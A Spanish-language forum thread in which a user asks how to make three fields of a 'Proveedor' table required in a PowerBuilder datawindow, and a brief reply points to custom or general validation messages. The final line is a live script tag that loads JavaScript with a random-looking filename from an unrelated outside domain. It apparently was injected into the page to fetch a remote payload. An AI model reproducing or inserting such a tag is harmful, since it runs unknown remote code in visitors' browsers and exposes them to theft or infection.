Campos vacíos en datawindow powerbuilder

Tengo mi datawindow para registro, pero quisiera ver como puedo validar algunos campos para que me aparezca un mensaje que diga falta ingresar datos de tales campos. Por ejemplo mi tabla Proveedor: quisiera validar razonsocial, ruc, teléfono, los demás campos como email y web pueden estar vacíos y guardar (solo validar los 3 primeros campos)

1 Respuesta

Respuesta

Gran experto:

Que pongo en "Validation Expression" del objeto datawindow,

En el "Validation Message" ya puse el mensaje por ejemplo ("debe ingresar nombre")

Dos opciones1.- Debes colocar una mensaje personalizado por cada campo que deseas validar.

2.- Si no desea utilizar campo 'Validation Message', un mensaje general como 'Ingrese valor requerido.'

Gracias gran experto.

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.3798595168561274"></script>